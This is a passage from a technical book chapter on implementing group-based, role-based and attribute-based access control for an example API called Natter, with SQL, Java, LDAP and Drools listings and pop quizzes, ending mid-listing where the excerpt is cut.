and groups: a group can have many members, and a user can belong to many groups.
If the membership of a group is defined in terms of subjects (which may be either
users or other groups), then it is also possible to have groups be members of other
groups, creating a hierarchical structure. For example, you might define a group for
employees and another one for customers. If you then add a new group for project
managers, you could add this group to the employees’ group: all project managers are
employees.
[Figure 8.1 diagram: a subject is either an individual user or a group; the members of a group are themselves subjects, so groups can contain other groups; a group can have many members and a subject can be in many groups, so it is a many-to-many relationship.]
Figure 8.1  Groups are added as a new type of subject. Permissions can then be assigned to individual users or to groups. A user can be a member of many groups and each group can have many members.
The advantage of groups is that you can now assign permissions to groups and be sure
that all members of that group have consistent permissions. When a new software
engineer joins your organization, you can simply add them to the “software engi-
neers” group rather than having to remember all the individual permissions that they
need to get their job done. And when they change jobs, you simply remove them from
that group and add them to a new one.
The implementation of simple groups is straightforward. Currently in the Natter API
you have written, there is a users table and a permissions table that acts as an ACL
linking users to permissions within a space. To add groups, you could first add a new
table to indicate which users are members of which groups:
CREATE TABLE group_members(
group_id VARCHAR(30) NOT NULL,
user_id VARCHAR(30) NOT NULL REFERENCES users(user_id));
CREATE INDEX group_member_user_idx ON group_members(user_id);
When the user authenticates, you can then look up the groups that user is a member
of and add them as an additional request attribute that can be viewed by other pro-
cesses. Listing 8.1 shows how groups could be looked up in the authenticate()
method in UserController after the user has successfully authenticated.
Listing 8.1  Looking up groups during authentication

if (hash.isPresent() && SCryptUtil.check(password, hash.get())) {
    request.attribute("subject", username);
    // Look up all groups that the user belongs to.
    var groups = database.findAll(String.class,
        "SELECT DISTINCT group_id FROM group_members " +
        "WHERE user_id = ?", username);
    // Set the user's groups as a new attribute on the request.
    request.attribute("groups", groups);
}
UNIX groups
Another advantage of groups is that they can be used to compress the permissions associated with an object in some cases. For example, the UNIX file system stores permissions for each file as a simple triple of permissions for the current user, the user's group, and anyone else. Rather than storing permissions for many individual users, the owner of the file can assign permissions to only a single pre-existing group, dramatically reducing the amount of data that must be stored for each file. The downside of this compression is that if a group doesn't exist with the required members, then the owner may have to grant access to a larger group than they would otherwise like to.

You can then either change the permissions table to allow either a user or group ID to be used (dropping the foreign key constraint to the users table):
CREATE TABLE permissions(
    space_id INT NOT NULL REFERENCES spaces(space_id),
    user_or_group_id VARCHAR(30) NOT NULL,   -- allow either a user or group ID
    perms VARCHAR(3) NOT NULL);
or you can create two separate permission tables and define a view that performs a
union of the two:
CREATE TABLE user_permissions(…);
CREATE TABLE group_permissions(…);
CREATE VIEW permissions(space_id, user_or_group_id, perms) AS
    SELECT space_id, user_id, perms FROM user_permissions
    UNION ALL
    SELECT space_id, group_id, perms FROM group_permissions;
To determine if a user has appropriate permissions, you would query first for individ-
ual user permissions and then for permissions associated with any groups the user is a
member of. This can be accomplished in a single query, as shown in listing 8.2, which
adjusts the requirePermission method in UserController to take groups into
account by building a dynamic SQL query that checks the permissions table for both
the username from the subject attribute of the request and any groups the user is a
member of. Dalesbred has support for safely constructing dynamic queries in its QueryBuilder class, so you can use that here for simplicity.
TIP  When building dynamic SQL queries, be sure to use only placeholders and never include user input directly in the query being built to avoid SQL injection attacks, which are discussed in chapter 2. Some databases support temporary tables, which allow you to insert dynamic values into the temporary table and then perform a SQL JOIN against the temporary table in your query. Each transaction sees its own copy of the temporary table, avoiding the need to generate dynamic queries.
Listing 8.2  Taking groups into account when looking up permissions

public Filter requirePermission(String method, String permission) {
    return (request, response) -> {
        if (!method.equals(request.requestMethod())) {
            return;
        }
        requireAuthentication(request, response);
        var spaceId = Long.parseLong(request.params(":spaceId"));
        var username = (String) request.attribute("subject");
        // Look up the groups the user is a member of.
        List<String> groups = request.attribute("groups");
        // Build a dynamic query to check permissions for the user.
        var queryBuilder = new QueryBuilder(
            "SELECT perms FROM permissions " +
            "WHERE space_id = ? " +
            "AND (user_or_group_id = ?", spaceId, username);
        // Include any groups in the query.
        for (var group : groups) {
            queryBuilder.append(" OR user_or_group_id = ?", group);
        }
        queryBuilder.append(")");
        var perms = database.findAll(String.class,
            queryBuilder.build());
        // Fail if none of the permissions for the user or groups
        // allow this action.
        if (perms.stream().noneMatch(p -> p.contains(permission))) {
            halt(403);
        }
    };
}
You may be wondering why you would split out looking up the user’s groups during
authentication to then just use them in a second query against the permissions table
during access control. It would be more efficient instead to perform a single query
that automatically checked the groups for a user using a JOIN or sub-query against the
group membership table, such as the following:
SELECT perms FROM permissions
 WHERE space_id = ?
   AND (user_or_group_id = ?       -- check permissions for this user directly
     OR user_or_group_id IN        -- check permissions for any groups the user is in
       (SELECT DISTINCT group_id
          FROM group_members
         WHERE user_id = ?))
Although this query is more efficient, it is unlikely that the extra query of the original
design will become a significant performance bottleneck. But combining the queries
into one has a significant drawback in that it violates the layering of authentication
and access control. As far as possible, you should ensure that all user attributes
required for access control decisions are collected during the authentication step, and
then decide if the request is authorized using these attributes. As a concrete example
of how violating this layering can cause problems, consider what would happen if you
changed your API to use an external user store such as LDAP (discussed in the next
section) or an OpenID Connect identity provider (chapter 7). In these cases, the
groups that a user is a member of are likely to be returned as additional attributes
during authentication (such as in the ID token JWT) rather than exist in the API’s
own database.
8.1.1  LDAP groups
In many large organizations, including most companies, users are managed centrally
in an LDAP (Lightweight Directory Access Protocol) directory. LDAP is designed for
storing user information and has built-in support for groups. You can learn more
about LDAP at https://ldap.com/basic-ldap-concepts/. The LDAP standard defines
the following two forms of groups:
1  Static groups are defined using the groupOfNames or groupOfUniqueNames object classes (an object class in LDAP defines the schema of a directory entry, describing which attributes it contains), which explicitly list the members of the group using the member or uniqueMember attributes. The difference between the two is that groupOfUniqueNames forbids the same member being listed twice.
2  Dynamic groups are defined using the groupOfURLs object class, where the membership of the group is given by a collection of LDAP URLs that define search queries against the directory. Any entry that matches one of the search URLs is a member of the group.
Some directory servers also support virtual static groups, which look like static groups
but query a dynamic group to determine the membership. Dynamic groups can be
useful when groups become very large, because they avoid having to explicitly list
every member of the group, but they can cause performance problems as the server
needs to perform potentially expensive search operations to determine the mem-
bers of a group.
To find which static groups a user is a member of in LDAP, you must perform a
search against the directory for all groups that have that user’s distinguished name as a
value of their member attribute, as shown in listing 8.3. First, you need to connect to
the LDAP server using the Java Naming and Directory Interface (JNDI) or another
LDAP client library. Normal LDAP users typically are not permitted to run searches,
so you should use a separate JNDI InitialDirContext for looking up a user’s groups,
configured to use a connection user that has appropriate permissions. To find the
groups that a user is in, you can use the following search filter, which finds all LDAP
groupOfNames entries that contain the given user as a member:
(&(objectClass=groupOfNames)(member=uid=test,dc=example,dc=org))
To avoid LDAP injection vulnerabilities (explained in chapter 2), you can use the
facilities in JNDI to let search filters have parameters. JNDI will then make sure that
any user input in these parameters is properly escaped before passing it to the LDAP
directory. To use this, replace the user input in the field with a numbered parameter
(starting at 0) in the form {0} or {1} or {2}, and so on, and then supply an Object
array with the actual arguments to the search method. The names of the groups can
then be found by looking up the CN (Common Name) attribute on the results.
Listing 8.3  Looking up LDAP groups for a user

import javax.naming.*;
import javax.naming.directory.*;
import java.util.*;

private List<String> lookupGroups(String username)
        throws NamingException {
    // Set up the connection details for the LDAP server.
    var props = new Properties();
    props.put(Context.INITIAL_CONTEXT_FACTORY,
        "com.sun.jndi.ldap.LdapCtxFactory");
    props.put(Context.PROVIDER_URL, ldapUrl);
    props.put(Context.SECURITY_AUTHENTICATION, "simple");
    props.put(Context.SECURITY_PRINCIPAL, connUser);
    props.put(Context.SECURITY_CREDENTIALS, connPassword);
    var directory = new InitialDirContext(props);
    var searchControls = new SearchControls();
    searchControls.setSearchScope(SearchControls.SUBTREE_SCOPE);
    searchControls.setReturningAttributes(new String[]{"cn"});
    var groups = new ArrayList<String>();

    // Search for all groups with the user as a member, using query
    // parameters to avoid LDAP injection vulnerabilities.
    var results = directory.search(
        "ou=groups,dc=example,dc=com",
        "(&(objectClass=groupOfNames)" +
        "(member=uid={0},ou=people,dc=example,dc=com))",
        new Object[]{ username },
        searchControls);

    // Extract the CN attribute of each group the user is a member of.
    while (results.hasMore()) {
        var result = results.next();
        groups.add((String) result.getAttributes()
            .get("cn").get(0));
    }
    directory.close();
    return groups;
}
To make looking up the groups a user belongs to more efficient, many directory serv-
ers support a virtual attribute on the user entry itself that lists the groups that user is a
member of. The directory server automatically updates this attribute as the user is
added to and removed from groups (both static and dynamic). Because this attribute
is nonstandard, it can have different names but is often called isMemberOf or some-
thing similar. Check the documentation for your LDAP server to see if it provides such
an attribute. Typically, it is much more efficient to read this attribute than to search
for the groups that a user is a member of.
TIP  If you need to search for groups regularly, it can be worthwhile to cache the results for a short period to prevent excessive searches on the directory.
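As a sketch of reading such a virtual attribute with JNDI (the attribute name, directory layout, and method name are assumptions that vary by deployment; the same connected directory context as listing 8.3 is assumed):

import javax.naming.NamingException;
import javax.naming.directory.DirContext;
import javax.naming.ldap.Rdn;
import java.util.ArrayList;
import java.util.List;

private List<String> lookupGroupsViaVirtualAttribute(
        DirContext directory, String username) throws NamingException {
    // Escape the username to avoid injecting special characters into the DN.
    var dn = "uid=" + Rdn.escapeValue(username) +
            ",ou=people,dc=example,dc=com";
    var attrs = directory.getAttributes(dn, new String[]{"isMemberOf"});
    var groups = new ArrayList<String>();
    var memberOf = attrs.get("isMemberOf");
    if (memberOf != null) {
        var values = memberOf.getAll();
        while (values.hasMore()) {
            groups.add((String) values.next());   // each value is a group DN
        }
    }
    return groups;
}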
8.2  Role-based access control
Although groups can make managing large numbers of users simpler, they do not
fully solve the difficulties of managing permissions for a complex API. First, almost all
implementations of groups still allow permissions to be assigned to individual users as
well as to groups. This means that to work out who has access to what, you still often
need to examine the permissions for all users as well as the groups they belong to. Sec-
ond, because groups are often used to organize users for a whole organization (such
as in a central LDAP directory), they sometimes cannot be very useful distinctions for
your API. For example, the LDAP directory might just have a group for all software
engineers, but your API needs to distinguish between backend and frontend engi-
neers, QA, and scrum masters. If you cannot change the centrally managed groups,
then you are back to managing permissions for individual users. Finally, even when
groups are a good fit for an API, there may be large numbers of fine-grained permis-
sions assigned to each group, making it difficult to review the permissions.
To address these drawbacks, role-based access control (RBAC) introduces the notion
of role as an intermediary between users and permissions, as shown in figure 8.2.
Pop quiz
1  True or False: In general, groups can contain other groups as members.
2  Which three of the following are common types of LDAP groups?
   a  Static groups
   b  Abelian groups
   c  Dynamic groups
   d  Virtual static groups
   e  Dynamic static groups
   f  Virtual dynamic groups
3  Given the following LDAP filter:
   (&(objectClass=#A)(member=uid=alice,dc=example,dc=com))
   which one of the following object classes would be inserted into the position marked #A to search for static groups Alice belongs to?
   a  group
   b  herdOfCats
   c  groupOfURLs
   d  groupOfNames
   e  gameOfThrones
   f  murderOfCrows
   g  groupOfSubjects
The answers are at the end of the chapter.
Permissions are no longer directly assigned to users (or to groups). Instead, permis-
sions are assigned to roles, and then roles are assigned to users. This can dramatically
simplify the management of permissions, because it is much simpler to assign some-
body the “moderator” role than to remember exactly which permissions a moderator
is supposed to have. If the permissions change over time, then you can simply change
the permissions associated with a role without needing to update the permissions for
many users and groups individually.
In principle, everything that you can accomplish with RBAC could be accom-
plished with groups, but in practice there are several differences in how they are used,
including the following:
- Groups are used primarily to organize users, while roles are mainly used as a way to organize permissions.
- As discussed in the previous section, groups tend to be assigned centrally, whereas roles tend to be specific to a particular application or API. As an example, every API may have an admin role, but the set of users that are administrators may differ from API to API.
- Group-based systems often allow permissions to be assigned to individual users, but RBAC systems typically don't allow that. This restriction can dramatically simplify the process of reviewing who has access to what.
- RBAC systems split the definition and assigning of permissions to roles from the assignment of users to those roles. It is much less error-prone to assign a user to a role than to work out which permissions each role should have, so this is a useful separation of duties that improves security.
- Roles may have a dynamic element. For example, some military and other environments have the concept of a duty officer, who has particular privileges and responsibilities only during their shift. When the shift ends, they hand over to the next duty officer, who takes on that role.
[Figure 8.2 diagram: users are assigned roles; permissions are assigned to roles, never directly to users.]
Figure 8.2  In RBAC, permissions are assigned to roles rather than directly to users. Users are then assigned to roles, depending on their required level of access.

RBAC is almost always used as a form of mandatory access control, with roles being described and assigned by whoever controls the systems that are being accessed. It is much less common to allow users to assign roles to other users the way they can with permissions in discretionary access control approaches. Instead, it is common to layer
a DAC mechanism such as OAuth2 (chapter 7) over an underlying RBAC system so
that a user with a moderator role, for example, can delegate some part of their per-
missions to a third party. Some RBAC systems give users some discretion over which
roles they use when performing API operations. For example, the same user may be
able to send messages to a chatroom as themselves or using their role as Chief Finan-
cial Officer when they want to post an official statement. The NIST (National Institute
of Standards and Technology) standard RBAC model (http://mng.bz/v9eJ) includes
a notion of session, in which a user can choose which of their roles are active at a
given time when making API requests. This works similarly to scoped tokens in
OAuth, allowing a session to activate only a subset of a user’s roles, reducing the dam-
age if the session is compromised. In this way, RBAC also better supports the principle
of least privilege than groups because a user can act with only a subset of their full
authority.
8.2.1  Mapping roles to permissions
There are two basic approaches to mapping roles to lower-level permissions inside
your API. The first is to do away with permissions altogether and instead to just anno-
tate each operation in your API with the role or roles that can call that operation. In
this case, you’d replace the existing requirePermission filter with a new requireRole
filter that enforced role requirements instead. This is the approach taken in Java
Enterprise Edition (Java EE) and the JAX-RS framework, where methods can be anno-
tated with the @RolesAllowed annotation to describe which roles can call that method
via an API, as shown in listing 8.4.
Listing 8.4  Annotating methods with roles in Java EE

import javax.ws.rs.*;
import javax.ws.rs.core.*;
// Role annotations are in the javax.annotation.security package.
import javax.annotation.security.*;

// Declare roles with the @DeclareRoles annotation.
@DeclareRoles({"owner", "moderator", "member"})
@Path("/spaces/{spaceId}/members")
public class SpaceMembersResource {

    // Describe role restrictions with the @RolesAllowed annotation.
    @POST
    @RolesAllowed("owner")
    public Response addMember() { .. }

    @GET
    @RolesAllowed({"owner", "moderator"})
    public Response listMembers() { .. }
}
The second approach is to retain an explicit notion of lower-level permissions, like
those currently used in the Natter API, and to define an explicit mapping from roles
to permissions. This can be useful if you want to allow administrators or other users to
define new roles from scratch, and it also makes it easier to see exactly what permis-
sions a role has been granted without having to examine the source code of the API.
Listing 8.5 shows the SQL needed to define four new roles based on the existing Nat-
ter API permissions:
- The social space owner has full permissions.
- A moderator can read posts and delete offensive posts.
- A normal member can read and write posts, but not delete any.
- An observer is only allowed to read posts and not write their own.
Open src/main/resources/schema.sql in your editor and add the lines from listing
8.5 to the end of the file and click save. You can also delete the existing permissions
table (and associated GRANT statements) if you wish.
Listing 8.5  Role permissions for the Natter API

-- Each role grants a set of permissions.
CREATE TABLE role_permissions(
    role_id VARCHAR(30) NOT NULL PRIMARY KEY,
    perms VARCHAR(3) NOT NULL
);
-- Define roles for Natter social spaces.
INSERT INTO role_permissions(role_id, perms)
    VALUES ('owner', 'rwd'),
           ('moderator', 'rd'),
           ('member', 'rw'),
           ('observer', 'r');
-- Because the roles are fixed, the API is granted read-only access.
GRANT SELECT ON role_permissions TO natter_api_user;
8.2.2  Static roles
Now that you’ve defined how roles map to permissions, you just need to decide how to
map users to roles. The most common approach is to statically define which users (or
groups) are assigned to which roles. This is the approach taken by most Java EE appli-
cation servers, which define configuration files to list the users and groups that should
be assigned different roles. You can implement the same kind of approach in the Nat-
ter API by adding a new table to map users to roles within a social space. Roles in the
Natter API are scoped to each social space so that the owner of one social space can-
not make changes to another.
DEFINITION  When users, groups, or roles are confined to a subset of your application, this is known as a security domain or realm.
Listing 8.6 shows the SQL to create a new table to map a user in a social space to a
role. Open schema.sql again and add the new table definition to the file. The
user_roles table, together with the role_permissions table, take the place of the old
permissions table. In the Natter API, you’ll restrict a user to having just one role
within a space, so you can add a primary key constraint on the space_id and user_id
fields. If you wanted to allow more than one role you could leave this out and manually
add an index on those fields instead. Don’t forget to grant permissions to the Natter
API database user.
Listing 8.6  Mapping static roles

-- Map users to roles within a space.
CREATE TABLE user_roles(
    space_id INT NOT NULL REFERENCES spaces(space_id),
    user_id VARCHAR(30) NOT NULL REFERENCES users(user_id),
    role_id VARCHAR(30) NOT NULL REFERENCES role_permissions(role_id),
    PRIMARY KEY (space_id, user_id)   -- Natter restricts each user to one role per space
);
-- Grant permissions to the Natter database user.
GRANT SELECT, INSERT, DELETE ON user_roles TO natter_api_user;
To grant roles to users, you need to update the two places where permissions are cur-
rently granted inside the SpaceController class:
- In the createSpace method, the owner of the new space is granted full permissions. This should be updated to instead grant the owner role.
- In the addMember method, the request contains the permissions for the new member. This should be changed to accept a role for the new member instead.
The first task is accomplished by opening the SpaceController.java file and finding the
line inside the createSpace method where the insert into the permissions table state-
ment is. Remove those lines and replace them instead with the following to insert a
new role assignment:
database.updateUnique(
"INSERT INTO user_roles(space_id, user_id, role_id) " +
"VALUES(?, ?, ?)", spaceId, owner, "owner");
Updating addMember involves a little more code, because you should ensure that you
validate the new role. Add the following line to the top of the class to define the
valid roles:
private static final Set<String> DEFINED_ROLES =
Set.of("owner", "moderator", "member", "observer");
You can now update the implementation of the addMember method to be role-based
instead of permission-based, as shown in listing 8.7. First, extract the desired role from
the request and ensure it is a valid role name. You can default to the member role if
none is specified as this is the normal role for most members. It is then simply a case
of inserting the role into the user_roles table instead of the old permissions table
and returning the assigned role in the response.
Listing 8.7  Adding new members with roles

public JSONObject addMember(Request request, Response response) {
    var json = new JSONObject(request.body());
    var spaceId = Long.parseLong(request.params(":spaceId"));
    var userToAdd = json.getString("username");
    // Extract the role from the input and validate it.
    var role = json.optString("role", "member");
    if (!DEFINED_ROLES.contains(role)) {
        throw new IllegalArgumentException("invalid role");
    }
    // Insert the new role assignment for this space.
    database.updateUnique(
        "INSERT INTO user_roles(space_id, user_id, role_id)" +
        " VALUES(?, ?, ?)", spaceId, userToAdd, role);
    // Return the role in the response.
    response.status(200);
    return new JSONObject()
        .put("username", userToAdd)
        .put("role", role);
}
8.2.3  Determining user roles
The final step of the puzzle is to determine which roles a user has when they make a
request to the API and the permissions that each role allows. This can be found by look-
ing up the user in the user_roles table to discover their role for a given space, and then
looking up the permissions assigned to that role in the role_permissions table. In con-
trast to the situation with groups in section 8.1, roles are usually specific to an API, so it
is less likely that you would be told a user’s roles as part of authentication. For this rea-
son, you can combine the lookup of roles and the mapping of roles into permissions
into a single database query, joining the two tables together, as follows:
SELECT rp.perms
FROM role_permissions rp
JOIN user_roles ur
ON ur.role_id = rp.role_id
WHERE ur.space_id = ? AND ur.user_id = ?
Searching the database for roles and permissions can be expensive, but the current
implementation will repeat this work every time the requirePermission filter is
called, which could be several times while processing a request. To avoid this issue and
simplify the logic, you can extract the permission look up into a separate filter that
runs before any permission checks and stores the permissions in a request attribute.
Listing 8.8 shows the new lookupPermissions filter that performs the mapping from
user to role to permissions, and the updated requirePermission method. By reus-
ing the existing permissions checks, you can add RBAC on top without having to
change the access control rules. Open UserController.java in your editor and update
the requirePermission method to match the listing.
Listing 8.8  Determining permissions based on roles

public void lookupPermissions(Request request, Response response) {
    requireAuthentication(request, response);
    var spaceId = Long.parseLong(request.params(":spaceId"));
    var username = (String) request.attribute("subject");

    // Determine user permissions by mapping user to role to permissions.
    var perms = database.findOptional(String.class,
        "SELECT rp.perms " +
        " FROM role_permissions rp JOIN user_roles ur" +
        "   ON rp.role_id = ur.role_id" +
        " WHERE ur.space_id = ? AND ur.user_id = ?",
        spaceId, username).orElse("");

    // Store the permissions in a request attribute.
    request.attribute("perms", perms);
}

public Filter requirePermission(String method, String permission) {
    return (request, response) -> {
        if (!method.equals(request.requestMethod())) {
            return;
        }
        // Retrieve the permissions from the request before checking.
        var perms = request.<String>attribute("perms");
        if (!perms.contains(permission)) {
            halt(403);
        }
    };
}
}
You now need to add calls to the new filter to ensure permissions are looked up. Open
the Main.java file and add the following lines to the main method, before the defini-
tion of the postMessage operation:
before("/spaces/:spaceId/messages",
userController::lookupPermissions);
before("/spaces/:spaceId/messages/*",
userController::lookupPermissions);
before("/spaces/:spaceId/members",
userController::lookupPermissions);
If you restart the API server you can now add users, create spaces, and add members
using the new RBAC approach. All the existing permission checks on API operations
are still enforced, only now they are managed using roles instead of explicit permis-
sion assignments.
8.2.4  Dynamic roles
Though static role assignments are the most common, some RBAC systems allow
more dynamic queries to determine which roles a user should have. For example, a
call center worker might be granted a role that allows them access to customer
records so that they can respond to customer support queries. To reduce the risk of
misuse, the system could be configured to grant the worker this role only during their
contracted working hours, perhaps based on their shift times. Outside of these times
the user would not be granted the role, and so would be denied access to customer
records if they tried to access them.
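There is no single standard way to express this, but as an illustrative sketch (the validity columns are my own invention, not part of the Natter schema), the static user_roles table from listing 8.6 could be extended with a validity period that the permission lookup then filters on:

-- Hypothetical time-limited role assignments; NULL means no restriction.
ALTER TABLE user_roles ADD COLUMN valid_from TIMESTAMP;
ALTER TABLE user_roles ADD COLUMN valid_to TIMESTAMP;

-- Only return permissions for roles that are active right now.
SELECT rp.perms
  FROM role_permissions rp
  JOIN user_roles ur ON rp.role_id = ur.role_id
 WHERE ur.space_id = ? AND ur.user_id = ?
   AND (ur.valid_from IS NULL OR ur.valid_from <= CURRENT_TIMESTAMP)
   AND (ur.valid_to IS NULL OR ur.valid_to > CURRENT_TIMESTAMP);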
Although dynamic role assignments have been implemented in several systems,
there is no clear standard for how to build dynamic roles. Approaches are usually
based on database queries or perhaps based on rules specified in a logical form
such as Prolog or the Web Ontology Language (OWL). When more flexible access
control rules are required, attribute-based access control (ABAC) has largely replaced
RBAC, as discussed in section 8.3. NIST has attempted to integrate ABAC with RBAC
to gain the best of both worlds (http://mng.bz/4BMa), but this approach is not widely
adopted.
Other RBAC systems implement constraints, such as making two roles mutually
exclusive; a user can’t have both roles at the same time. This can be useful for enforc-
ing separation of duties, such as preventing a system administrator from also manag-
ing audit logs for a sensitive system.
Pop quiz
4  Which of the following are more likely to apply to roles than to groups?
   a  Roles are usually bigger than groups.
   b  Roles are usually smaller than groups.
   c  All permissions are assigned using roles.
   d  Roles better support separation of duties.
   e  Roles are more likely to be application specific.
   f  Roles allow permissions to be assigned to individual users.
5  What is a session used for in the NIST RBAC model? Pick one answer.
   a  To allow users to share roles.
   b  To allow a user to leave their computer unlocked.
   c  To allow a user to activate only a subset of their roles.
   d  To remember the user's name and other identity attributes.
   e  To allow a user to keep track of how long they have worked.
6  Given the following method definition
   @<annotation here>
   public Response adminOnlyMethod(String arg);
   what annotation value can be used in the Java EE and JAX-RS role system to restrict the method to only be called by users with the ADMIN role?
   a  @DenyAll
   b  @PermitAll
   c  @RunAs("ADMIN")
   d  @RolesAllowed("ADMIN")
   e  @DeclareRoles("ADMIN")
The answers are at the end of the chapter.
8.3 Attribute-based access control
Although RBAC is a very successful access control model that has been widely deployed,
in many cases the desired access control policies cannot be expressed through simple
role assignments. Consider the call center agent example from section 8.2.4. As well as
preventing the agent from accessing customer records outside of their contracted
working hours, you might also want to prevent them accessing those records if they
are not actually on a call with that customer. Allowing each agent to access all cus-
tomer records during their working hours is still more authority than they really need
to get their job done, violating the principle of least privilege. It may be that you can
determine which customer the call agent is talking to from their phone number
(caller ID), or perhaps the customer enters an account number using the keypad
before they are connected to an agent. You'd like to allow the agent access to just that customer's file for the duration of the call, perhaps allowing five minutes afterward for them to finish writing any notes.
To handle these kinds of dynamic access control decisions, an alternative to RBAC
has been developed known as ABAC: attribute-based access control. In ABAC, access con-
trol decisions are made dynamically for each API request using collections of attri-
butes grouped into four categories:
- Attributes about the subject; that is, the user making the request. This could include their username, any groups they belong to, how they were authenticated, when they last authenticated, and so on.
- Attributes about the resource or object being accessed, such as the URI of the resource or a security label (TOP SECRET, for example).
- Attributes about the action the user is trying to perform, such as the HTTP method.
- Attributes about the environment or context in which the operation is taking place. This might include the local time of day, or the location of the user performing the action.
The output of ABAC is then an allow or deny decision, as shown in figure 8.3.
Figure 8.3 In an ABAC system, access control decisions are made dynamically based on attributes describing the subject, resource, action, and environment or context of the API request.
Listing 8.9 shows example code for gathering attribute values to feed into an ABAC
decision process in the Natter API. The code implements a Spark filter that can be
included before any API route definition in place of the existing requirePermission
filters. The actual implementation of the ABAC permission check is left abstract for
now; you will develop implementations in the next sections. The code collects attri-
butes into the four attribute categories described above by examining the Spark
Request object and extracting the username and any groups populated during
authentication. You can include other attributes, such as the current time, in the envi-
ronment properties. Extracting these kind of environmental attributes makes it easier
to test the access control rules because you can easily pass in different times of day in
your tests. If you’re using JWTs (chapter 6), then you might want to include claims
from the JWT Claims Set in the subject attributes, such as the issuer or the issued-at
time. Rather than using a simple boolean value to indicate the decision, you should
use a custom Decision class. This is used to combine decisions from different policy
rules, as you’ll see in section 8.3.1.
Listing 8.9 Gathering attribute values

package com.manning.apisecurityinaction.controller;

import java.time.LocalTime;
import java.util.*;

import spark.*;

import static spark.Spark.halt;

public abstract class ABACAccessController {

    public void enforcePolicy(Request request, Response response) {
        // Gather relevant attributes and group them into categories.
        var subjectAttrs = new HashMap<String, Object>();
        subjectAttrs.put("user", request.attribute("subject"));
        subjectAttrs.put("groups", request.attribute("groups"));

        var resourceAttrs = new HashMap<String, Object>();
        resourceAttrs.put("path", request.pathInfo());
        resourceAttrs.put("space", request.params(":spaceId"));

        var actionAttrs = new HashMap<String, Object>();
        actionAttrs.put("method", request.requestMethod());

        var envAttrs = new HashMap<String, Object>();
        envAttrs.put("timeOfDay", LocalTime.now());
        envAttrs.put("ip", request.ip());

        // Check whether the request is permitted.
        var decision = checkPermitted(subjectAttrs, resourceAttrs,
                actionAttrs, envAttrs);

        // If not, halt with a 403 Forbidden error.
        if (!decision.isPermitted()) {
            halt(403);
        }
    }

    abstract Decision checkPermitted(
            Map<String, Object> subject,
            Map<String, Object> resource,
            Map<String, Object> action,
            Map<String, Object> env);

    // The Decision class will be described next.
    public static class Decision {
    }
}
8.3.1 Combining decisions
When implementing ABAC, typically access control decisions are structured as a set
of independent rules describing whether a request should be permitted or denied.
If more than one rule matches a request, and they have different outcomes, then
the question is which one should be preferred. This boils down to the two following
questions:
- What should the default decision be if no access control rules match the request?
- How should conflicting decisions be resolved?
The safest option is to default to denying requests unless explicitly permitted by some
access rule, and to give deny decisions priority over permit decisions. This requires at
least one rule to match and decide to permit the action and no rules to decide to deny
the action for the request to be allowed. When adding ABAC on top of an existing
access control system to enforce additional constraints that cannot be expressed in
the existing system, it can be simpler to instead opt for a default permit strategy where
requests are permitted to proceed if no ABAC rules match at all. This is the approach
you’ll take with the Natter API, adding additional ABAC rules that deny some requests
and let all others through. In this case, the other requests may still be rejected by the
existing RBAC permissions enforced earlier in the chapter.
The logic for implementing this default permit with deny overrides strategy is
shown in the Decision class in listing 8.10. The permit variable is initially set to true
but any call to the deny() method will set it to false. Calls to the permit() method are
ignored because this is the default unless another rule has called deny() already, in
which case the deny should take precedence. Open ABACAccessController.java in
your editor and add the Decision class as an inner class.
Listing 8.10 Implementing decision combining

public static class Decision {
    private boolean permit = true;    // Default to permit

    // An explicit deny decision overrides the default.
    public void deny() {
        permit = false;
    }

    // Explicit permit decisions are ignored.
    public void permit() {
    }

    boolean isPermitted() {
        return permit;
    }
}
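If you were instead using ABAC as the primary access control mechanism, the safer default-deny, deny-overrides strategy described earlier would be more appropriate. A minimal sketch of that variant (the class name is mine, not part of the Natter code):

public static class DenyByDefaultDecision {
    private boolean explicitPermit = false;
    private boolean explicitDeny = false;

    public void permit() { explicitPermit = true; }

    public void deny() { explicitDeny = true; }

    boolean isPermitted() {
        // At least one rule must permit, and no rule may deny.
        return explicitPermit && !explicitDeny;
    }
}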
8.3.2 Implementing ABAC decisions
Although you could implement ABAC access control decisions directly in Java or
another programming language, it's often clearer if the policy is expressed in the form of rules or a domain-specific language (DSL) explicitly designed to express access control decisions. In this section you'll implement a simple ABAC decision engine
using the Drools (https://drools.org) business rules engine from Red Hat. Drools can
be used to write all kinds of business rules and provides a convenient syntax for
authoring access control rules.
TIP
Drools is part of a larger suite of tools marketed under the banner
“Knowledge is Everything,” so many classes and packages used in Drools
include the kie abbreviation in their names.
To add the Drools rule engine to the Natter API project, open the pom.xml file in
your editor and add the following dependencies to the <dependencies> section:
<dependency>
<groupId>org.kie</groupId>
<artifactId>kie-api</artifactId>
<version>7.26.0.Final</version>
</dependency>
<dependency>
<groupId>org.drools</groupId>
<artifactId>drools-core</artifactId>
<version>7.26.0.Final</version>
</dependency>
<dependency>
<groupId>org.drools</groupId>
<artifactId>drools-compiler</artifactId>
<version>7.26.0.Final</version>
</dependency>
When it starts up, Drools will look for a file called kmodule.xml on the classpath that
defines the configuration. You can use the default configuration, so navigate to the
folder src/main/resources and create a new folder named META-INF under resources.
Then create a new file called kmodule.xml inside the src/main/resources/META-INF
folder with the following contents:
<?xml version="1.0" encoding="UTF-8" ?>
<kmodule xmlns="http://www.drools.org/xsd/kmodule">
</kmodule>
You can now implement a version of the ABACAccessController class that evaluates
decisions using Drools. Listing 8.11 shows code that implements the checkPermitted
method by loading rules from the classpath using KieServices.get().getKieClasspathContainer().
To query the rules for a decision, you should first create a new KIE session and set
an instance of the Decision class from the previous section as a global variable that the
rules can access. Each rule can then call the deny() or permit() methods on this
object to indicate whether the request should be allowed. The attributes can then be
added to the working memory for Drools using the insert() method on the session.
Because Drools prefers strongly typed values, you can wrap each set of attributes in a
simple wrapper class to distinguish them from each other (described shortly). Finally,
call session.fireAllRules() to evaluate the rules against the attributes and then
check the value of the decision variable to determine the final decision. Create a new
file named DroolsAccessController.java inside the controller folder and add the con-
tents of listing 8.11.
Listing 8.11 Evaluating decisions with Drools

package com.manning.apisecurityinaction.controller;

import java.util.*;

import org.kie.api.KieServices;
import org.kie.api.runtime.KieContainer;

public class DroolsAccessController extends ABACAccessController {

    private final KieContainer kieContainer;

    public DroolsAccessController() {
        // Load all rules found in the classpath.
        this.kieContainer = KieServices.get().getKieClasspathContainer();
    }

    @Override
    Decision checkPermitted(Map<String, Object> subject,
                            Map<String, Object> resource,
                            Map<String, Object> action,
                            Map<String, Object> env) {
        // Start a new Drools session.
        var session = kieContainer.newKieSession();
        try {
            // Create a Decision object and set it as a global
            // variable named "decision."
            var decision = new Decision();
